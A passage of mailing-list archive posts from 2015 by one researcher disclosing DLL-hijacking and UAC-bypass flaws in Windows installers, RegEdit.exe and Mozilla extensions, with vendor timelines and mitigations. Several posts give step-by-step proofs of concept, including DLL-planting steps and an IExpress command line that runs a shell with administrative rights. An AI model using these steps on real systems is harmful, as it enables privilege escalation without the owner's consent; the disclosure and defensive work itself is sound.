allow tampering via DLL hijacking.


Or (better!): reduce your programs dependencies, i.e. stick to
the basics^Wfunctions provided by Kernel32.dll (and the other
"known DLLs") and eliminate the attack vectors for DLL hijacking
via WinMM.dll and other "unknown DLLs".

If you don't or can't: see above and WARN ALL YOUR USERS/CUSTOMERS!

JFTR: the list of "known DLLs" varies with different Windows versions!


1. Version.dll was one of the "known DLLs" of Windows NT 5.x (resp.
   still is in Windows Embedded POSReady 2009): the (many) executable
   installers linked to its functions were/are therefore not
   vulnerable in Windows NT 5.x resp. Windows Embedded POSReady 2009.

   In newer versions of Windows Version.dll is none of the "known DLLs",
   so all executable installers using its functions became vulnerable
   to DLL hijacking then.

2. SetupAPI.dll is none of the "known DLLs" in Windows NT 5.x, but
   became so in newer versions of Windows: the (many) executable
   installers linked to its functions were/are vulnerable unter Windows
   NT 5.x resp. Windows Embedded POSReady 2009, but ain't vulnerable
   any more in all newer versions of Windows.

Conclusion: executable installers which link to "unknown DLLs" are in
general unsafe for normal users.

The only SAFE option for general use is: DUMP executable installers.

stay tuned
Stefan Kanthak

Executable uninstallers are vulnerable^WEVIL (case 12): Avira Registry Cleaner allows arbitrary code execution with escalation of privilege

2015-12-17 Thread Stefan Kanthak
Hi @ll,

avira_registry_cleaner_en.exe, available from
to clean up remnants the uninstallers of their snakeoil products
fail to remove, is vulnerable: it loads and executes WTSAPI32.dll,
UXTheme.dll and RichEd20.dll from its application directory
(tested and verified under Windows XP SP3 and Windows 7 SP1).

For software downloaded with a web browser this is typically the
"Downloads" directory: see
and <>

Additionally see
the above named DLLs are delay-loaded.
You had been warned, kids!

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" Windows' "user account control"
runs it with administrative privileges ("protected" administrators
are prompted for consent, unprivileged standard users are prompted
for an administrator password); execution of WTSAPI32.dll, UXTheme.dll
and/or RichEd20.dll thus results in an escalation of privilege!

If WTSAPI32.dll, UXTheme.dll or RichEd20.dll gets planted in the
users "Downloads" directory per "drive-by download" this
vulnerability becomes a remote code execution WITH escalation of

Proof of concept/demonstration:

1. visit <>, download
   <>, save
   it as WTSAPI32.dll in your "Downloads" directory, then copy it
   as UXTheme.dll and RichEd20.dll;

2. download avira_registry_cleaner_en.exe from
   and save it in your "Downloads" directory;

3. execute avira_registry_cleaner_en.exe from your "Downloads"

4. notice the message boxes displayed from WTSAPI32.dll, UXTheme.dll
   and/or RichEd20.dll placed in step 1.

stay tuned
Stefan Kanthak


2015-11-15vulnerability report sent to vendor

2015-11-16vendor acknowledges receipt

2015-11-17vendor verifies vulnerability report and anounces to
  publish a fix within two weeks

2015-11-18asked vendor to request a CVE identifier and check
  their other executable (un)installers too

2015-11-19vendor replies:
  "We updated our compiler and its runtime to a version
   which should mitigate the attack vector and modified
   the DLL load order"

2015-12-08notification from vendor:
  "We released a fixed version today"

2015-12-08your "fixed" cleaner still loads the named DLLs

2015-12-09response from vendor, asking how I verified execution
  of UXTheme.dll, with screenshot of "Process Monitor"
  showing the tell-tale line
  "C:\Users\...\Downloads\CRYPTBASE.dllNAME NOT FOUND"

2015-12-09see <>

  sent SAFER.log produced on Windows XP and Windows 7 to
  vendor; also told them to look at the screenshot!

2015-12-17response from vendor:
  "We don't see a vulnerability in the attempt to load
   CRYPTBASE.dll from the application directory as shown
   by Process Monitor. We think we fixed the reported
   vulnerabilities and will not provide another fix."

I really LOVE snakeoil vendors who DON'T care about the safety and
security of their customers.

2015-12-18report published

Executable installers are vulnerable^WEVIL (case 10): McAfee Security Scan Plus, WebAdvisor and CloudAV (Beta)

2015-12-15 Thread Stefan Kanthak
Hi @ll,

several McAfee "security" products, most notably their Security Scan
Plus (see <> for a
previous advisory) which Adobe pushes to unsuspecting users of Adobe
Reader and Flash Player, are offered as executable installers built
with the vulnerable Nullsoft Scriptable Install System (NSIS) (see
<> for details).

These executable installers are vulnerable and allow arbitrary
(remote) code execution and escalation of privilege via the well-
known attacks already published in the advisory regarding NSIS and
the advisory <> titled
Mitigations for "carpet bombing" alias "directory poisoning" attacks against 
executable installers

For details specific to Intel's/McAfee's products and their
vulnerabilities see Intel's Security Bulletin published today:

stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege

2015-12-11 Thread Stefan Kanthak
Hi @ll,

the executable installers [°] of 7-Zip (see <>)
and ALL self-extracting archives created with 7-Zip are vulnerable:

1. They load and execute a rogue/bogus/malicious UXTheme.dll [']
   eventually found in the directory they are started from (the
   "application directory").

   For software downloaded with a web browser this is typically the
   "Downloads" directory: see
   and <>

   If UXTheme.dll gets planted in the users "Downloads" directory
   per "drive-by download" this vulnerability becomes a remote code

   Due to an application manifest embedded in the executable which
   specifies "requireAdministrator" or the "installer detection" (see
   of Windows' "user account control" executable installers are
   typically started with administrative privileges ("protected"
   administrators are prompted for consent, unprivileged standard
   users are prompted for an administrator password); execution of
   UXTheme.dll then results in an escalation of privilege!

Proof of concept/demonstration:

1. visit <>, download
   <> and store
   it as UXTheme.dll in your "Downloads" directory;

   Note: this is the 32-bit DLL; the 64-bit DLL is available in

2. download <> and store it in the
   "Downloads" directory;

3. run 7z1512.exe from the "Downloads" directory;

4. notice the message box displayed from UXTheme.dll placed in step 1.



   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   and "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider to apply either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See <> as well as
   <> plus
   or <> and finally

stay tuned
Stefan Kanthak

PS: see <> (resp. the
not yet finished <!execute.html>)
for more details!

PPS: the case numbers are not in chronological order.

[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

ALWAYS use the resp. target platforms native package and archive

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe

Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE

2015-10-28 Thread Stefan Kanthak
Hi @ll,

Mozilla's (executable) full setup packages for Windows allow arbitrary
code execution resp. escalation of privilege: their SETUP.EXE loads
SHFOLDER.DLL ['] from a temporary (sub)directory "%TEMP%\7zS.tmp\"
created during self-extraction of the full setup packages.

This vulnerability is well-known, every developer past absolute beginner
should know about it: <>

See <> for all the
trouble Mozilla's developers went through to fix this vulnerability in
the 7zip self-extractor.
See <> for this
vulnerability in their maintenance_installer.exe.

Proof of concept:

1. fetch any Mozilla full setup package (these are self-extracting
   archives built with 7zip), for example "Firefox Setup 38.3.0esr.exe"
   from <>

2. extract this full setup package into an arbitrary directory, for
   example "%TEMP%\7zSxyz.tmp", using (again for example)
  7za.exe x -o"%TEMP%\7zSxyz.tmp" "Firefox Setup 38.3.0esr.exe"

3. fetch <>
   (see <>) and save it
   as "%TEMP%\7zSxyz.tmp\shfolder.dll"

4. start "%TEMP%\7zSxyz.tmp\setup.exe" per double-click:
   the installer detection of Windows user account control (see
   will chime in and prompt for consent resp. for an administrator
   password, then "%TEMP%\7zSxyz.tmp\setup.exe" loads
   "%TEMP%\7zSxyz.tmp\shfolder.dll" which displays a message box



   If your favourite applications are not distributed in the native
   installer package format of the resp. target OS: ask^WURGE their
   vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such software!

1. Turn off privilege elevation for standard users and installer
   detection for all users:

   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 

   See <>

2. deny execution in all "%TEMP%" directories and their subdirectories:

   * add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /SDDL for example);

   * use "software restriction policies" resp. AppLocker.

stay tuned
Stefan Kanthak

PS: Mozilla sits on this unfixed vulnerability for about 30 months:
see <>

['] SHFOLDER.DLL is cruft from the last millennium, it was used on
Windows 9x without Internet Explorer 4; see

DONT USE the code shown in this MSKB article!

See <>,
<> and

[²] self-extracting archives and executable installers are flawed^W
insanely stupid in concept and dangerous in practice.

ALWAYS use the resp. platforms native package and archive format.

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind of
"DLL (and EXE) Search Order Hijacking" attack.
Since both .INF and .MSI can access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary directory" too.

See <> and
<> as example of a
native installer package for "Firefox 38.3.0 ESR (x86 de)":

1.a. create FIREFOX.CAB from the unpacked full setup package
 (see above; I used the german language version): run the
 command line
   MAKECAB.EXE /D SourceDir="%TEMP%\7zS.tmp\core" /F FIREFOX.DDF

1.b. create FIREFOX.CAB from the copy installed on your system:
 run the command line
   MAKECAB.EXE /D SourceDir="%ProgramFiles%\Mozilla Firefox" /F 

2. install Firefox from FIREFOX.CAB: right-click FIREFOX.INF and
   then click "Install", or run the command line
   InfDefaultInstall.Exe "\FIREFOX.INF"
   RunDll32.Exe SetupAPI.Dll,InstallHinfSection DefaultInstall 132 

Defense in depth -- the Microsoft way (part 35): Windows Explorer ignores "Run as administrator" ...

2015-09-21 Thread Stefan Kanthak
Hi @ll,

since Microsoft introduced the security theatre named "user account
control" with Windows Vista users cant start (another instance of)
the Windows Explorer with elevated rights any more: the "Run as
administrator" and the "Run as different user" context menu entries
only start another instance of Windows Explorer with but the
credentials of the logged on (interactive) user.

No, neither starting Windows Explorer per "Explorer.Exe /Separate"
nor setting the following registry entries overcomes this limitation:



Microsoft is well aware of this, but still doesnt remove or disable
these dysfunctional context menu entries for Explorer.exe, although
their own user experience interface guidelines request that (context)
menu entries which are not applicable must not be shown or have to be

See <>:

| Disable menu items that don't apply to the current context
| Remove rather than disable context menu items that don't
| apply to the current context.

or <>

If you want to get rid of "Run as administrator" and "Run as
different user" for Explorer.exe to save yourself, your users and
your support/helpdesk from confusion or frustration add the following
registry entries:



See <>
and <>
to understand how and why this registry entry works.

JFTR: the context menu entry "Run as administrator" doesnt work at
      all in standard user accounts when UAC is set to "never elevate".
  This is another clear violation of Microsofts own UX guidelines!

stay tuned
Stefan Kanthak

PS: the script <> adds
this and several other missing registry entries which enable
"Run as administrator" and "Run as different user" for quite some
file types.

Re: Defense in depth -- the Microsoft way (part 33): arbitrary code execution (and UAC bypass) via RegEdit.exe

2015-09-10 Thread Stefan Kanthak
I wrote ... and forgot some mitigations:


> Proof of concept (for Windows 2000 to Windows 10; use your own "sentinel"
>   instead of mine for Windows NT4):
> 1. get <> (this is a
>32-bit executable [*]; the 64-bit executable is available on request);
> 2. copy SENTINEL.DLL as %SystemRoot%\ACLUI.DLL (use the method shown
>in <> to bypass UAC);
> 3. execute %SystemRoot%\RegEdit.exe
> Mitigation(s):
> ~~
> 1. For %! In (%SystemRoot%\*.exe
>   %SystemRoot%\*.dll) Do If Not Exist %SystemRoot%\System32\%~nx! 
> MkLink /H %SystemRoot%\System32\%~nx! %!
>   This but only helps if RegEdit.exe is not called with its fully
>   qualified pathname %SystemRoot%\RegEdit.exe
> 2. Define ACLUI.DLL as "known DLL":
> Manager\KnownDLLs]

3. Prevent elevation of RegEdit.exe per UAC in "protected
   administrator" accounts:



4. Demote your "protected administrator" account created during Windows
   setup to a standard user account.

   See <>
   and <>:

   | When you set up Windows, you were required to create a user account.
   | This account is an administrator account that allows you to set up
   | your computer and install any programs that you'd like to use. Once
   | you finish setting up your computer, we recommend that you create a
   | standard account and use it for your everyday computing. If you create
   | new user accounts, you should also make them standard accounts. Using
   | standard accounts will help keep your computer more secure.

> [*] see <>

stay tuned
Stefan Kanthak

PS: more than 22 years after introduction of Windows NT Microsoft STILL
continues their VERY BAD and REALLY NASTY habit to give the user
account(s) created during Windows setup administrative rights!

No, UAC is NOT a security boundary, but just a convenience feature:
see <>,
<>, ...

Jane and Joe Average will happily give consent to almost any program
(like RegEdit.exe) which asks for elevated privileges, DESPITE most

Defense in depth -- the Microsoft way (part 33): arbitrary code execution (and UAC bypass) via RegEdit.exe

2015-09-09 Thread Stefan Kanthak
Hi @ll,

part 31 (see <>)
showed how to execute arbitrary (rogue) executables planted as
%SystemRoot%\System32\RegEdit.exe, %SystemRoot%\System32\Explorer.exe
etc. instead of %SystemRoot%\RegEdit.exe, %SystemRoot%\Explorer.exe
etc., including a possible UAC bypass.

This works since Microsoft (mis)places these executables (for
historical "reasons") in %windir%\ alias %SystemRoot%\ (the path
returned from the GetWindowsDirectory() function), although the
hard-coded search order uses %SystemRoot%\System32\ (the path
returned from the GetSystemDirectory() function) before %windir%\
alias %SystemRoot%\

JFTR: in x64 versions of Windows these historical "reasons" are but
  abandoned completely for 32-bit executables: the 32-bit
  counterparts of all 64-bit executables located in %SystemRoot%\
  have been moved to %SystemRoot%\SysWoW64\.
  This is backwards compatible since %SystemRoot%\System32\ is
  redirected to %SystemRoot%\SysWoW64\ for 32-bit executables and
  due to the hard-coded search order, plus

  | Access to %windir%\regedit.exe is redirected to
  | %windir%\SysWOW64\regedit.exe. 

(Un)fortunately there is no redirection from %SystemRoot%\RegEdit.exe
to %SystemRoot%\System32\RegEdit.exe for 64-bit executables and in
x86 versions of Windows.

RegEdit.exe load various DLLs; since the hard-coded search order
(see <>) uses
the application directory first it is possible to have it load
arbitrary (rogue) DLLs planted into %SystemRoot%\ instead of the
system DLLs installed in %SystemRoot%\System32\ (except for the
"known DLLs", see <>).

Of course any other executable (mis)placed in %SystemRoot%\ might be
(ab)used too!

Proof of concept (for Windows 2000 to Windows 10; use your own "sentinel"
  instead of mine for Windows NT4):

1. get <> (this is a
   32-bit executable [*]; the 64-bit executable is available on request);

2. copy SENTINEL.DLL as %SystemRoot%\ACLUI.DLL (use the method shown
   in <> to bypass UAC);

3. execute %SystemRoot%\RegEdit.exe


1. For %! In (%SystemRoot%\*.exe
  %SystemRoot%\*.dll) Do If Not Exist %SystemRoot%\System32\%~nx! 
MkLink /H %SystemRoot%\System32\%~nx! %!

   This but only helps if RegEdit.exe is not called with its fully
   qualified pathname %SystemRoot%\RegEdit.exe

2. Define ACLUI.DLL as "known DLL":


stay tuned
Stefan Kanthak

[*] see <>

Defense in depth -- the Microsoft way (part 32): yet another (trivial) UAC bypass resp. privilege escalation

2015-09-04 Thread Stefan Kanthak
Hi @ll,

in <> I showed an
elaborated way for privilege elevation using IExpress (and other
self-extracting) installers containing *.MSI or *.MSP which works
"in certain situations".

Microsoft addressed this vulnerability with

In <> I showed an
indirect way for privilege elevation using IExpress installers
and "binary planting".

But there's a direct way too: just call any IExpress installer
(the Microsoft download center offers plenty of them) with a
command line of your choice, for example

CAPICOM-KB931906-v2102.exe /C:"%COMSPEC% /K Title PWNED!"

Due to UACs installer detection the given command line is executed
with full administrative privileges.

stay tuned
Stefan Kanthak

PS: this attack vector can be (ab)used with WSUS(pect)!

Using legitimate IExpress packages like CAPICOM-KB931906-v2102.exe,
RvkRoots.exe (cf. <>)
or RootsUpd-KB931125-*.exe which are distributed per Windows Update
has the advantage that the clients %SystemRoot%\WindowsUpdate.log
and their %SystemRoot%\SoftwareDistribution\Download folder dont
show telltale signs of 3rd party executables (as used/proposed by
the authors of WSUSpect).

JFTR: I *love* security fixes which are vulnerable themself.

Re: Windows Platform Binary Table (WPBT) - BIOS PE backdoor

2015-08-13 Thread Stefan Kanthak
Kevin Beaumont wrote:


 Microsoft documented a feature in Windows 8 and above called Windows
 Platform Binary Table.

Cf. where WPBT is linked to alias

 Up until two days ago, this was a single Word
 document not referenced elsewhere on Google:

 This feature allows a BIOS to deliver the payload of an executable,
 which is run in memory, silently, each time a system is booted.  The
 executable code is run under under Session Manager context (i.e.

This sort of feature is NOT new: with Windows 2003 Microsoft introduced
the loading of virtual OEM device drivers during Windows setup, see

AFAIK at least HP and Dell used this method to deploy [F6] drivers
embedded in their BIOS.


stay tuned
Stefan Kanthak

Re: [FD] Mozilla extensions: a security nightmare

2015-08-07 Thread Stefan Kanthak
Mario Vilas wrote:

 W^X applies to memory protection, completely irrelevant here.

I recommend to revisit elementary school and start to learn reading!

| JFTR: current software separates code from data in virtual memory and
|   uses write xor execute or data execution prevention to
|   prevent both tampering of code and execution of data.
|   The same separation and protection can and of course needs to be
|   applied to code and data stored in the file system too!

 Plus you're saying in every situation when a user can overwrite its
 own binaries in its own home folder it's a bug

Again: learn to read!

| No. Writing executable code is NOT the problem here.
| The problem is running this code AFTER it has been tampered.
| (Not only) Mozilla but does NOT detect tampered code.

 - that would make every single Linux distro vulnerable whenever you
 install some software in your own home directory that only you can use.

# mount /home -onoexec

 If you're talking about file and directory permissions it makes sense to
 talk about privilege escalation.


 But I don't think you really understand those security principles you're
 citing. For example, can you give me an example of an attack scenario?

The attack vector is OBVIOUS, exploitation is TRIVIAL.

 Also, take a chill pill. Your aggressive tone isn't really helping you at

Posting on top because that's where the cursor happens to be is like
sh*tt*ng in your pants because that's where your *ssh*l* happens to be!

Vulnerable MSVC++ runtime distributed with LibreOffice 5.0.0 for Windows

2015-08-06 Thread Stefan Kanthak
Hi @ll,

the just released latest version of for Windows
distributes (once again) a completely outdated and vulnerable MSVC++

The installer package LibreOffice_5.0.0_Win_x86.msi contains the files

msvcp80.dll 8.0.50727.42
msvcr80.dll 8.0.50727.42
Microsoft.VC80.CRT.manifest 8.0.50727.42

of the initial/RTM release of the MSVC++ Runtime 2005.

These DLLs have been updated serveral times since their initial release:

For general guidelines see

Since the libraries are installed in the application's own directory
they are NOT detected by Windows Update Agent (or tools like
Secunia Personal Inspector) and are therefore NOT updated via
Windows/Microsoft update!

This is a well known problem, see,
but apparently doesn't seem to care!
I reported this error SEVERAL times in the past, for example see

JFTR: Windows Vista and later include NEWER versions of these DLLs,
  there is absolutely no need to redistribute an ancient version
  in your product at all (especially after Windows XP and 2003
  have reached end-of-life)!

stay tuned
Stefan Kanthak

Re: [FD] Mozilla extensions: a security nightmare

2015-08-06 Thread Stefan Kanthak
Ansgar Wiechers wrote:

 On 2015-08-05 Stefan Kanthak wrote:
 Mario Vilas wrote:
 If this is the case then the problem is one of bad file permissions,
 not the location.

 Incidentally, many other browsers and tons of software also store
 executable code in %APPDATA%.
 EVERY program which stores executable code in user-writable locations
 is CRAPWARE and EVIL since it undermines the security boundary created
 by privilege separation and installation of executables in
 write-protected locations.
 Both are BASIC principles of computer security.


 That only becomes an issue if anyone other than the user putting the
 code into the location is supposed to be running something from that

Are you SURE that everybody who installs TB 38 knows or recognizes
that TB writes executable code to their user profile(s)?
Who is but the user who puts the code into that location in the first
The user who executes TB and let it create/update the profile?
The administrator who installs TB?
The creator of TBs installer?
 Otherwise you'd have to prevent users from putting scripts or
 standalone executables anywhere they have write access.

No. Writing executable code is NOT the problem here.
The problem is running this code AFTER it has been tampered.
(Not only) Mozilla but does NOT detect tampered code.

 Which is somewhat less than desirable (or feasible) in most environments.

I recommend to get the idea of write Xor execute...

 The problem with browser extensions is that they're exposed to input
 from the outside world, which could make them remotely exploitable in
 case of a vulnerability, and that user-installed extensions are not
 subject to company software update procedures.

That's still ANOTHER problem.


Re: [FD] Mozilla extensions: a security nightmare

2015-08-06 Thread Stefan Kanthak
Mario Vilas wrote:

 This makes no sense.

Right. W^X obviously doesnt make sense to YOU.

 Administrator can write everywhere and users can write their own
 directories. There is no privilege escalation here, no security
 boundary being crossed.

Who wrote anything about privilege escalation here?
Burn your strawmen somewehre else.


PS: STOP top-posting, NOW!

On Thu, Aug 6, 2015 at 7:30 PM, Stefan Kanthak

 Mario Vilas wrote:

  If it can only be written by your own user, what would be the
  security boundary being crossed here?

 Please read AGAIN what I already wrote!

 | The security boundary created by privilege separation

 ie. Administrator/root vs. user

 | and installation of executables in write-protected locations.

 ie. %ProgramFiles% or /usr/bin, where only privileged users can write.


 PS: top-posting is EVIL too!

 On Wed, Aug 5, 2015 at 5:33 PM, Stefan Kanthak

  Mario Vilas wrote:
   %APPDATA% is within the user's home directory - by default it should
   not be writeable by other users.
  Did I mention OTHER users?
  Clearly not, so your argument is moot.
   If this is the case then the problem is one of bad file permissions,
   not the location.
   Incidentally, many other browsers and tons of software also store
   executable code in %APPDATA%.
  EVERY program which stores executable code in user-writable locations
  is CRAPWARE and EVIL since it undermines the security boundary created
  by privilege separation and installation of executables in
  Both are BASIC principles of computer security.
   I think security nightmare may be a bit of an overstatement here.
  No, it's just the right wording since it violates two basic principles.
   I'll refrain from panicking about this issue for the time being.
  JFTR: top posting is a bad habit too!
  On Tue, Aug 4, 2015 at 3:22 PM, Stefan Kanthak
   Hi @ll,
   Mozilla Thunderbird 38 and newer installs and activates per default
   the 'Lightning' extension.
   Since extensions live in the (Firefox and) Thunderbird profiles
   (which are stored beneath %APPDATA% in Windows) and 'Lightning' comes
   (at least for Windows) with a DLL and some Javascript, Thunderbird
   with 'Lightning' violates one of the mandatory and basic requirements
   of the now 20 year old Designed for Windows guidelines and breaks a
   security boundary: applications must be installed in %ProgramFiles%
   where they are protected against tampering by unprivileged users (and
   of course malware running in their user accounts too) since only
   privileged users can write there.
   Code installed in %APPDATA% (or any other user-writable location) is
   but not protected against tampering.
   This is a fundamental flaw of (not only) Mozilla's extensions, and a
   security nightmare.
   Separation of code from (user) data also allows to use whitelisting
   (see for
   example) to secure Windows desktops and servers: users (and of course
   Windows too) don't need to run code stored in their user profiles,
   they only need to run the installed programs/applications, so unwanted
   software including malware can easily be blocked from running.
   JFTR: current software separates code from data in virtual memory and
 uses write xor execute or data execution prevention to
 prevent both tampering of code and execution of data.
 The same separation and protection can and of course needs to be
 applied to code and data stored in the file system too!
   The Lightning extension for Windows but defeats the tamper protection
   and code/data separation provided by Windows:
   1. its calbasecomps.dll can be replaced or overwritten with an
  arbitrary DLL which DllMain() is executed every time this DLL is
   2. its (XUL/chrome) Javascripts can be replaced or overwritten and
  used to load and call arbitrary DLLs via js-ctypes.
  Only non-XUL/chrome Javascript is less critical since its execution
  is confined by (Firefox and) Thunderbird and subject to the
  restrictions imposed by these programs for non-XUL/chrome
   Disable profile local installation of extensions in Mozilla products,
   enable ONLY application global installation of extensions.
   stay tuned
   Stefan Kanthak
   Sent through the Full Disclosure mailing list
   Web Archives  RSS:

 There's a reason we separate military and the police: one fights the enemy
 of the state, the other

Re: [FD] Mozilla extensions: a security nightmare

2015-08-06 Thread Stefan Kanthak
Mario Vilas wrote:

 If it can only be written by your own user, what would be the
 security boundary being crossed here?

Please read AGAIN what I already wrote!

| The security boundary created by privilege separation

ie. Administrator/root vs. user

| and installation of executables in write-protected locations.

ie. %ProgramFiles% or /usr/bin, where only privileged users can write.


PS: top-posting is EVIL too!

On Wed, Aug 5, 2015 at 5:33 PM, Stefan Kanthak

 Mario Vilas wrote:

  %APPDATA% is within the user's home directory - by default it should
  not be writeable by other users.

 Did I mention OTHER users?
 Clearly not, so your argument is moot.

  If this is the case then the problem is one of bad file permissions,
  not the location.
  Incidentally, many other browsers and tons of software also store
  executable code in %APPDATA%.


 EVERY program which stores executable code in user-writable locations
 is CRAPWARE and EVIL since it undermines the security boundary created
 by privilege separation and installation of executables in write-protected
 Both are BASIC principles of computer security.

  I think security nightmare may be a bit of an overstatement here.

 No, it's just the right wording since it violates two basic principles.

  I'll refrain from panicking about this issue for the time being.

 JFTR: top posting is a bad habit too!

 On Tue, Aug 4, 2015 at 3:22 PM, Stefan Kanthak

  Hi @ll,
  Mozilla Thunderbird 38 and newer installs and activates per default
  the 'Lightning' extension.
  Since extensions live in the (Firefox and) Thunderbird profiles
  (which are stored beneath %APPDATA% in Windows) and 'Lightning' comes
  (at least for Windows) with a DLL and some Javascript, Thunderbird
  with 'Lightning' violates one of the mandatory and basic requirements
  of the now 20 year old Designed for Windows guidelines and breaks a
  security boundary: applications must be installed in %ProgramFiles%
  where they are protected against tampering by unprivileged users (and
  of course malware running in their user accounts too) since only
  privileged users can write there.
  Code installed in %APPDATA% (or any other user-writable location) is
  but not protected against tampering.
  This is a fundamental flaw of (not only) Mozilla's extensions, and a
  security nightmare.
  Separation of code from (user) data also allows to use whitelisting
  (see for
  example) to secure Windows desktops and servers: users (and of course
  Windows too) don't need to run code stored in their user profiles,
  they only need to run the installed programs/applications, so unwanted
  software including malware can easily be blocked from running.
  JFTR: current software separates code from data in virtual memory and
uses write xor execute or data execution prevention to
prevent both tampering of code and execution of data.
The same separation and protection can and of course needs to be
applied to code and data stored in the file system too!
  The Lightning extension for Windows but defeats the tamper protection
  and code/data separation provided by Windows:
  1. its calbasecomps.dll can be replaced or overwritten with an
 arbitrary DLL which DllMain() is executed every time this DLL is
  2. its (XUL/chrome) Javascripts can be replaced or overwritten and
 used to load and call arbitrary DLLs via js-ctypes.
 Only non-XUL/chrome Javascript is less critical since its execution
 is confined by (Firefox and) Thunderbird and subject to the
 restrictions imposed by these programs for non-XUL/chrome Javascript.
  Disable profile local installation of extensions in Mozilla products,
  enable ONLY application global installation of extensions.
  stay tuned
  Stefan Kanthak
  Sent through the Full Disclosure mailing list
  Web Archives  RSS:

There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.

Re: [FD] Mozilla extensions: a security nightmare

2015-08-05 Thread Stefan Kanthak
Mario Vilas wrote:

 %APPDATA% is within the user's home directory - by default it should
 not be writeable by other users.

Did I mention OTHER users?
Clearly not, so your argument is moot.

 If this is the case then the problem is one of bad file permissions,
 not the location.

 Incidentally, many other browsers and tons of software also store
 executable code in %APPDATA%.


EVERY program which stores executable code in user-writable locations
is CRAPWARE and EVIL since it undermines the security boundary created
by privilege separation and installation of executables in write-protected
Both are BASIC principles of computer security.

 I think security nightmare may be a bit of an overstatement here.

No, it's just the right wording since it violates two basic principles.

 I'll refrain from panicking about this issue for the time being.

JFTR: top posting is a bad habit too!

On Tue, Aug 4, 2015 at 3:22 PM, Stefan Kanthak

 Hi @ll,

 Mozilla Thunderbird 38 and newer installs and activates per default
 the 'Lightning' extension.

 Since extensions live in the (Firefox and) Thunderbird profiles
 (which are stored beneath %APPDATA% in Windows) and 'Lightning' comes
 (at least for Windows) with a DLL and some Javascript, Thunderbird
 with 'Lightning' violates one of the mandatory and basic requirements
 of the now 20 year old Designed for Windows guidelines and breaks a
 security boundary: applications must be installed in %ProgramFiles%
 where they are protected against tampering by unprivileged users (and
 of course malware running in their user accounts too) since only
 privileged users can write there.

 Code installed in %APPDATA% (or any other user-writable location) is
 but not protected against tampering.
 This is a fundamental flaw of (not only) Mozilla's extensions, and a
 security nightmare.

 Separation of code from (user) data also allows to use whitelisting
 (see for
 example) to secure Windows desktops and servers: users (and of course
 Windows too) don't need to run code stored in their user profiles,
 they only need to run the installed programs/applications, so unwanted
 software including malware can easily be blocked from running.

 JFTR: current software separates code from data in virtual memory and
   uses write xor execute or data execution prevention to
   prevent both tampering of code and execution of data.
   The same separation and protection can and of course needs to be
   applied to code and data stored in the file system too!

 The Lightning extension for Windows but defeats the tamper protection
 and code/data separation provided by Windows:

 1. its calbasecomps.dll can be replaced or overwritten with an
arbitrary DLL which DllMain() is executed every time this DLL is

 2. its (XUL/chrome) Javascripts can be replaced or overwritten and
used to load and call arbitrary DLLs via js-ctypes.

Only non-XUL/chrome Javascript is less critical since its execution
is confined by (Firefox and) Thunderbird and subject to the
restrictions imposed by these programs for non-XUL/chrome Javascript.


 Disable profile local installation of extensions in Mozilla products,
 enable ONLY application global installation of extensions.

 stay tuned
 Stefan Kanthak

 Sent through the Full Disclosure mailing list
 Web Archives  RSS:

Mozilla extensions: a security nightmare

2015-08-04 Thread Stefan Kanthak
Hi @ll,

Mozilla Thunderbird 38 and newer installs and activates per default
the 'Lightning' extension.

Since extensions live in the (Firefox and) Thunderbird profiles
(which are stored beneath %APPDATA% in Windows) and 'Lightning' comes
(at least for Windows) with a DLL and some Javascript, Thunderbird
with 'Lightning' violates one of the mandatory and basic requirements
of the now 20 year old Designed for Windows guidelines and breaks a
security boundary: applications must be installed in %ProgramFiles%
where they are protected against tampering by unprivileged users (and
of course malware running in their user accounts too) since only
privileged users can write there.

Code installed in %APPDATA% (or any other user-writable location) is
but not protected against tampering.
This is a fundamental flaw of (not only) Mozilla's extensions, and a
security nightmare.

Separation of code from (user) data also allows to use whitelisting
(see for
example) to secure Windows desktops and servers: users (and of course
Windows too) don't need to run code stored in their user profiles,
they only need to run the installed programs/applications, so unwanted
software including malware can easily be blocked from running.

JFTR: current software separates code from data in virtual memory and
  uses write xor execute or data execution prevention to
  prevent both tampering of code and execution of data.
  The same separation and protection can and of course needs to be
  applied to code and data stored in the file system too!

The Lightning extension for Windows but defeats the tamper protection
and code/data separation provided by Windows:

1. its calbasecomps.dll can be replaced or overwritten with an
   arbitrary DLL which DllMain() is executed every time this DLL is

2. its (XUL/chrome) Javascripts can be replaced or overwritten and
   used to load and call arbitrary DLLs via js-ctypes.

   Only non-XUL/chrome Javascript is less critical since its execution
   is confined by (Firefox and) Thunderbird and subject to the
